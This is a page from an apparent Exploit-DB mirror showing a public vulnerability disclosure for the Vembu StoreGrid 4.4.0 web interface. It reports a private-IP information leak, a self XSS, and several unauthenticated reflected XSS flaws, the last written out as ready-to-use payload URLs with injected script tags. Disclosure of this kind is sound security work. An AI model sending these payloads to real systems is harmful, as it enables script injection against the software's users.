bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/46549.txt
Offensive Security 790034e7df DB: 2019-03-16 
7 changes to exploits/shellcodes

Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow
NetData 1.13.0 - HTML Injection
CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload
ICE HRM 23.0 - Multiple Vulnerabilities
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
Laundry CMS - Multiple Vulnerabilities
Moodle 3.4.1 - Remote Code Execution
2019-03-16 05:01:58 +00:00

22 lines
No EOL
2.1 KiB
Text
Raw Blame History

# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
# Discovery Date: 2018-12-05
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.vembu.com/
# Software Link : N/A
# Google Dork: N/A
# Version: 4.4.0
# CVE : CVE-2014-10078,CVE-2014-10079
Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities.
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80.
==========================================================================================================================
Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication.
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result=
https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font>
=============================================================================================================================
Self XSS. The server web interface contains a self XSS in the search function.
==============================================================================================================================
Reference in a new issue View git blame Copy permalink